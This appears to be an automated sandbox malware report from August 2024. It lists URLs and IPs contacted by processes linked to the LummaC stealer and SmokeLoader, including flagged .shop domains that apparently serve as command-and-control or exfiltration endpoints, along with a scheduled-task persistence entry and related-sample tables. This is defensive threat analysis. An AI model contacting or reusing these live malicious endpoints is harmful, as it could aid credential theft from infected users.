https://petstore.swagger.io/v2/swagger.json	46F6.exe, 00000008.00000002.2910551461.000000C0001D4000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000000.2678059924.00007FF7CD7CB000.00000008.00000001.01000000.00000007.sdmp, 46F6.exe, 00000008.00000002.2931930528.00007FF7CD7D2000.00000008.00000001.01000000.00000007.sdmp, 46F6.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1857879944.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tenntysjuxmz.shop/G	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tenntysjuxmz.shop/I	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://tenntysjuxmz.shop:443/apifiles/76561199724331900	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://deallerospfosu.shop/W	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://complaintsipzzx.shop/	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tenntysjuxmz.shop/apip	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tenntysjuxmz.shop/	BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/about/	BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mennyudosirso.shop/	BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://languagedscie.shop/apip	BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://mundoparachicas.space:443/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12	E9D3.exe, 00000006.00000003.2632827584.00000255F93F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://deallerospfosu.shop/	BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1856548209.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1855305019.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1854877371.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://languagedscie.shop/	BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.14.101	complaintsipzzx.shop	United States	13335	CLOUDFLARENETUS	true
189.163.89.217	100xmargin.com	Mexico	8151	UninetSAdeCVMX	true
188.114.97.3	languagedscie.shop	European Union	13335	CLOUDFLARENETUS	true
23.197.127.21	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
58.151.148.90	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
188.114.96.3	bassizcellskz.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.204.20	deallerospfosu.shop	United States	13335	CLOUDFLARENETUS	true
172.67.166.231	writerospzm.shop	United States	13335	CLOUDFLARENETUS	true
77.29.6.193	mzxn.ru	Macedonia	6821	MT-AS-OWNbulOrceNikolovbbMK	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1494781
Start date and time:	2024-08-19 09:26:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	oRKal761Qm.exe renamed because original name is a hash value
Original Sample Name:	bead29639262d9e62e74e23eb65eb480.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/4@19/10
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 46F6.exe, PID 4412 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: oRKal761Qm.exe

Simulations

Behavior and APIs

Time	Type	Description
03:27:26	API Interceptor	417336x Sleep call for process: explorer.exe modified
03:28:39	API Interceptor	11x Sleep call for process: E9D3.exe modified
03:29:15	API Interceptor	1x Sleep call for process: BitLockerToGo.exe modified
08:27:43	Task Scheduler	Run new task: Firefox Default Browser Agent 6830C0CD311EF1F1 path: C:\Users\user\AppData\Roaming\ssegbth

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.14.101	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	VfflPcEzWm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	BJRX4k4WYc.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	TCoH7VTdPv.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	G838oYcLqN.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	yEIhhlohep.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	7zaC3J8wBV.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse
188.114.97.3	http://te.nhrnick.com/	Get hash	malicious	Unknown	Browse	te.nhrnick.com/
	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	neintyy19sb.top/v1/upload.php
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	www.eraplay88rtpgacor.lat/pt46/?Cj90E=2U5FQK94ZXdB/CZGbEmAqiVYM6OiqGkb5XXzbZC/PxdEk7+YTa81A9JVSB2t8XsQKzff&GVWh=CdT0vvb
	FedEx Shipping Document.exe	Get hash	malicious	Azorult	Browse	l0h5.shop/CM341/index.php
	http://binanceevn.com/index/index/lang/ko-kr/Trade/tradelist	Get hash	malicious	Unknown	Browse	binanceevn.com/Verify/code
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xls	Get hash	malicious	Unknown	Browse	jiourl.com/anbdld
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xls	Get hash	malicious	Unknown	Browse	jiourl.com/anbdld
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/qLW2DYuh/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/jSVzi5ju/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/Ry4NfKBu/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
languagedscie.shop	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.97.3
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.97.3
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.97.3
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.96.3
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	188.114.97.3
writerospzm.shop	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.166.231
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.166.231
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.166.231
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
deallerospfosu.shop	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.69.39
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.204.20
steamcommunity.com	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.199.218.33
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.192.247.89
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.199.218.33
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.199.218.33
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.199.218.33

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.158.159
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.69.39
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.166.231
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
UninetSAdeCVMX	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	189.163.163.13
	TCoH7VTdPv.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	189.163.163.13
	mips	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	148.207.124.39
	SecuriteInfo.com.Linux.Siggen.9999.2027.4559.elf	Get hash	malicious	Mirai	Browse	189.182.121.240
	oc_i486.elf	Get hash	malicious	Mirai	Browse	189.241.234.198
	oc_x86_64.elf	Get hash	malicious	Mirai	Browse	189.228.94.199
	oc_i686.elf	Get hash	malicious	Mirai	Browse	200.38.218.14
	154.216.18.223-arm-2024-08-17T03_43_59.elf	Get hash	malicious	Mirai	Browse	189.185.250.171
	154.216.18.223-x86-2024-08-17T03_44_00.elf	Get hash	malicious	Mirai	Browse	201.145.48.177
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	187.171.36.107
CLOUDFLARENETUS	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.158.159
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.69.39
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
